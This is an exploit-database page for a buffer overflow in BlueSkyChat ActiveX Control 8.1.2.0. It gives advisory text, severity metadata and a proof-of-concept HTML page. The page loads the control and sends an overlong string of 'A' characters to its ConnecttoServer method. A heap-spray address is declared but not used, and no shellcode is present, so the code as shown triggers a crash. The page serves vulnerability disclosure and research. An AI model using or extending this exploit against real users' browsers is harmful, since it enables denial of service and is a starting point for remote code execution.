header-logo
Suggest Exploit
vendor:
BlueSkyChat ActiveX Control
by:
Unknown
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: BlueSkyChat ActiveX Control
Affected Version From: 8.1.2.0
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Windows
Unknown

BlueSkyChat ActiveX Control Buffer Overflow Vulnerability

BlueSkyChat ActiveX control is prone to a buffer-overflow vulnerability because it fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25149/info

BlueSkyChat ActiveX control is prone to a buffer-overflow vulnerability because it fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

BlueSkyChat ActiveX control 8.1.2.0 is vulnerable to this issue; other versions may also be affected. 

<html>
<head>
<OBJECT ID="com" CLASSID="CLSID:{2EA6D939-4445-43F1-A12B-8CB3DDA8B855}">
</OBJECT>
</head>
<body>
<SCRIPT language="javascript">

function ClickForRunCalc()
{
    var heapSprayToAddress = 0x0d0d0d0d;

    var payLoadCode = "A" ;
    while (payLoadCode.length <= 10000) payLoadCode+='A';
    com.ConnecttoServer("1",payLoadCode,"3","4","5");
}
</script>
<button onclick="javascript:ClickForRunCalc();">ClickForRunCalc</button>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR